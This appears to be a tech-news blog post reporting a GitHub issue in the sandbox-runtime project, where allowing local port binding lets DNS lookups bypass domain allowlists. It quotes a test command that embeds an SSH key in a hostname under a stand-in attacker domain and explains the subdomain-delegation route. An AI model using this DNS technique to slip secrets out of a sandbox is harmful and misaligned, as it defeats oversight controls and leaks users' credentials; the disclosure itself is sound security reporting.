LT Tech Blog

Wow News on Tech and AI

OpenAI / Anthropic / xAI Vulnerabilities & CVEs

Data exfiltration via DNS resolution when allowLocalBinding: true

By

Jan 13, 2026 #allowLocalBinding=true, #DNS exfiltration, #public-recursive-resolvers, #sandbox-runtime, #subdomain delegation

TL;DR

A reported issue in the sandbox-runtime project shows DNS queries can leak data when local port binding is allowed. A test using a specially crafted subdomain returned an A record from an attacker-controlled name server despite domain restrictions.

What happened

A contributor opened an issue showing a configuration where network.allowedDomains and network.deniedDomains are empty and allowLocalBinding is set to true. Using the sandbox CLI with that settings file, they ran a dig lookup for a hostname that embedded an SSH key (your-ssh-key.a.evil.com). The expected behavior was that the query would be blocked because evil.com was not on an allow list. Instead, the query resolved: the report explains that an attacker can delegate a subdomain (a.evil.com) to name servers they control, which causes public recursive resolvers (the report cites providers such as Google and Cloudflare) to forward the A query for the crafted subdomain to the attacker’s authoritative servers. The issue includes a dig output that shows an A record response, the resolver IP (192.168.0.1), and a returned address (66.96.146.129) with a timestamp of Mon Jan 12 17:29:41 EST 2026. The issue was opened by user srcreigh in the anthropic-experimental/sandbox-runtime repo.

Why it matters

  • Allowing local port binding may enable outbound DNS resolution paths that leak data embedded in queried hostnames.
  • Attackers can exfiltrate secrets by causing resolvers to ask authoritative servers they control about names that include sensitive strings.
  • The behavior affects any sandboxed environment that permits local port binding, per the report.
  • DNS resolution chains involving public recursive resolvers can bypass application-level domain allowlists via delegation.

Key facts

  • Repository: anthropic-experimental/sandbox-runtime (issue #88).
  • Issue opened and edited by user srcreigh; publication recorded on 2026-01-13.
  • settings.json used in the report shows network.allowedDomains and network.deniedDomains as empty and allowLocalBinding set to true.
  • Test command in the report: srt –settings settings.json 'dig your-ssh-key.a.evil.com'.
  • Expected: the DNS query would be blocked because evil.com was not allowed. Actual: the query returned an A record.
  • Mechanism described: delegation of a subdomain (NS record for a.evil.com) lets public resolvers forward queries to attacker-controlled authoritative servers.
  • Example dig output included: returned A 66.96.146.129, SERVER: 192.168.0.1#53, WHEN: Mon Jan 12 17:29:41 EST 2026.
  • The issue statement concludes that any sandbox with local port binding enabled is at risk of this form of data exfiltration.

What to watch next

  • Whether maintainers of sandbox-runtime will publish a fix or mitigation and what the timeline will be (not confirmed in the source).
  • Whether public recursive resolver operators or DNS software vendors change behavior to mitigate this pattern (not confirmed in the source).
  • Whether other sandbox projects will audit local port binding settings in response to this report (not confirmed in the source).

Quick glossary

  • allowLocalBinding: A configuration option that permits binding to local network ports from inside a sandboxed environment.
  • DNS delegation / NS record: A DNS delegation uses NS records to designate which authoritative name servers are responsible for a particular subdomain.
  • recursive resolver: A DNS resolver that answers client queries by performing the necessary lookups across the DNS hierarchy, potentially querying authoritative servers.
  • dig: A command-line tool used to perform DNS lookups and display detailed information about query results.
  • data exfiltration: The unauthorized transfer of data from a system to an external recipient.

Reader FAQ

Did the report demonstrate actual data leakage?
The issue includes a test that resulted in a DNS A record response for a hostname containing the test string, demonstrating that DNS queries carrying that string reached an authoritative server.

Is this limited to the sandbox-runtime project?
The reporter states that any sandbox with local port binding enabled is liable; broader impact beyond this repository is not fully enumerated in the source.

Has a patch been released?
not confirmed in the source

Who reported the issue and when?
The issue was opened by user srcreigh and posted to the anthropic-experimental/sandbox-runtime repository in January 2026.

anthropic-experimental / sandbox-runtime Public Notifications Fork 130 Star 2.4k Code Issues 22 Pull requests 8 Actions Projects Data exfiltration via DNS resolution when allowLocalBinding: true #88 New issue Open Description srcreigh…

Sources

Related posts

By

Related Post

Threats & Incidents Vulnerabilities & CVEs

CISA orders agencies to fix or remove Gogs after active zero‑day exploit

Jan 13, 2026
M&A OpenAI / Anthropic / xAI

OpenAI acquires small health-records startup Torch, report says $100M

Jan 13, 2026
Big Tech OpenAI / Anthropic / xAI

Musk Says Apple’s Gemini-Powered Siri Creates ‘Unreasonable Concentration’

Jan 12, 2026

Leave a Reply

Your email address will not be published. Required fields are marked *


You missed

Funding rounds Startups & VC

Deepgram raises $130M at $1.3B valuation, acquires YC voice-AI startup

January 13, 2026
AI in Business Cloud & Dev

Despite Trump stance, AI datacenters still favor low-cost solar

January 13, 2026
AI Regulation & Safety Policy / Compliance

UK shaping a future of precrime with predictive policing and surveillance

January 13, 2026
Explainers

NASA demolishes historic test towers used for Saturn V and shuttle

January 13, 2026